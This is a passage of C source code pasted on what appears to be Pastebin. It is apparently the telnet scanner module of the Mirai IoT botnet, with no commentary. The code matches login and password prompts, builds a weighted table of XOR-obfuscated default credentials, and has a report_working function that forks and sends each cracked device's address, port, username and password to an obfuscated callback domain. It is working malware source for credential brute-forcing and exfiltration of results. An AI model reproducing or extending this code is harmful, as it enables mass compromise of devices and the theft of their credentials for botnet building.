  794. int i, prompt_ending = -1;
  795.  
  796. for (i = conn->rdbuf_pos - 1; i > 0; i--)
  797. {
  798. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
  799. {
  800. prompt_ending = i + 1;
  801. break;
  802. }
  803. }
  804.  
  805. if (prompt_ending == -1)
  806. {
  807. int tmp;
  808.  
  809. if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "ogin", 4)) != -1)
  810. prompt_ending = tmp;
  811. else if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "enter", 5)) != -1)
  812. prompt_ending = tmp;
  813. }
  814.  
  815. if (prompt_ending == -1)
  816. return 0;
  817. else
  818. return prompt_ending;
  819. }
  820.  
  821. static int consume_pass_prompt(struct scanner_connection *conn)
  822. {
  823. char *pch;
  824. int i, prompt_ending = -1;
  825.  
  826. for (i = conn->rdbuf_pos - 1; i > 0; i--)
  827. {
  828. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#')
  829. {
  830. prompt_ending = i + 1;
  831. break;
  832. }
  833. }
  834.  
  835. if (prompt_ending == -1)
  836. {
  837. int tmp;
  838.  
  839. if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7)) != -1)
  840. prompt_ending = tmp;
  841. }
  842.  
  843. if (prompt_ending == -1)
  844. return 0;
  845. else
  846. return prompt_ending;
  847. }
  848.  
  849. static int consume_resp_prompt(struct scanner_connection *conn)
  850. {
  851. char *tkn_resp;
  852. int prompt_ending, len;
  853.  
  854. table_unlock_val(TABLE_SCAN_NCORRECT);
  855. tkn_resp = table_retrieve_val(TABLE_SCAN_NCORRECT, &len);
  856. if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1) != -1)
  857. {
  858. table_lock_val(TABLE_SCAN_NCORRECT);
  859. return -1;
  860. }
  861. table_lock_val(TABLE_SCAN_NCORRECT);
  862.  
  863. table_unlock_val(TABLE_SCAN_RESP);
  864. tkn_resp = table_retrieve_val(TABLE_SCAN_RESP, &len);
  865. prompt_ending = util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1);
  866. table_lock_val(TABLE_SCAN_RESP);
  867.  
  868. if (prompt_ending == -1)
  869. return 0;
  870. else
  871. return prompt_ending;
  872. }
  873.  
  874. static void add_auth_entry(char *enc_user, char *enc_pass, uint16_t weight)
  875. {
  876. int tmp;
  877.  
  878. auth_table = realloc(auth_table, (auth_table_len + 1) * sizeof (struct scanner_auth));
  879. auth_table[auth_table_len].username = deobf(enc_user, &tmp);
  880. auth_table[auth_table_len].username_len = (uint8_t)tmp;
  881. auth_table[auth_table_len].password = deobf(enc_pass, &tmp);
  882. auth_table[auth_table_len].password_len = (uint8_t)tmp;
  883. auth_table[auth_table_len].weight_min = auth_table_max_weight;
  884. auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight;
  885. auth_table_max_weight += weight;
  886. }
  887.  
  888. static struct scanner_auth *random_auth_entry(void)
  889. {
  890. int i;
  891. uint16_t r = (uint16_t)(rand_next() % auth_table_max_weight);
  892.  
  893. for (i = 0; i < auth_table_len; i++)
  894. {
  895. if (r < auth_table[i].weight_min)
  896. continue;
  897. else if (r < auth_table[i].weight_max)
  898. return &auth_table[i];
  899. }
  900.  
  901. return NULL;
  902. }
  903.  
  904. static void report_working(ipv4_t daddr, uint16_t dport, struct scanner_auth *auth)
  905. {
  906. struct sockaddr_in addr;
  907. int pid = fork(), fd;
  908. struct resolv_entries *entries = NULL;
  909.  
  910. if (pid > 0 || pid == -1)
  911. return;
  912.  
  913. if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  914. {
  915. #ifdef DEBUG
  916. printf("[report] Failed to call socket()\n");
  917. #endif
  918. exit(0);
  919. }
  920.  
  921. table_unlock_val(TABLE_SCAN_CB_DOMAIN);
  922. table_unlock_val(TABLE_SCAN_CB_PORT);
  923.  
  924. entries = resolv_lookup(table_retrieve_val(TABLE_SCAN_CB_DOMAIN, NULL));
  925. if (entries == NULL)
  926. {
  927. #ifdef DEBUG
  928. printf("[report] Failed to resolve report address\n");
  929. #endif
  930. return;
  931. }
  932. addr.sin_family = AF_INET;
  933. addr.sin_addr.s_addr = entries->addrs[rand_next() % entries->addrs_len];
  934. addr.sin_port = *((port_t *)table_retrieve_val(TABLE_SCAN_CB_PORT, NULL));
  935. resolv_entries_free(entries);
  936.  
  937. table_lock_val(TABLE_SCAN_CB_DOMAIN);
  938. table_lock_val(TABLE_SCAN_CB_PORT);
  939.  
  940. if (connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)) == -1)
  941. {
  942. #ifdef DEBUG
  943. printf("[report] Failed to connect to scanner callback!\n");
  944. #endif
  945. close(fd);
  946. exit(0);
  947. }
  948.  
  949. uint8_t zero = 0;
  950. send(fd, &zero, sizeof (uint8_t), MSG_NOSIGNAL);
  951. send(fd, &daddr, sizeof (ipv4_t), MSG_NOSIGNAL);
  952. send(fd, &dport, sizeof (uint16_t), MSG_NOSIGNAL);
  953. send(fd, &(auth->username_len), sizeof (uint8_t), MSG_NOSIGNAL);
  954. send(fd, auth->username, auth->username_len, MSG_NOSIGNAL);
  955. send(fd, &(auth->password_len), sizeof (uint8_t), MSG_NOSIGNAL);
  956. send(fd, auth->password, auth->password_len, MSG_NOSIGNAL);
  957.  
  958. #ifdef DEBUG
  959. printf("[report] Send scan result to loader\n");
  960. #endif
  961.  
  962. close(fd);
  963. exit(0);
  964. }
  965.  
  966. static char *deobf(char *str, int *len)
  967. {
  968. int i;
  969. char *cpy;
  970.  
  971. *len = util_strlen(str);
  972. cpy = malloc(*len + 1);
  973.  
  974. util_memcpy(cpy, str, *len + 1);
  975.  
  976. for (i = 0; i < *len; i++)
  977. {
  978. cpy[i] ^= 0xDE;
  979. cpy[i] ^= 0xAD;
  980. cpy[i] ^= 0xBE;
  981. cpy[i] ^= 0xEF;
  982. }
  983.  
  984. return cpy;
  985. }
  986.  
  987. static BOOL can_consume(struct scanner_connection *conn, uint8_t *ptr, int amount)
  988. {
  989. uint8_t *end = conn->rdbuf + conn->rdbuf_pos;
  990.  
  991. return ptr + amount < end;
  992. }
  993.  
  994. #endif
  995. Desktop version
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!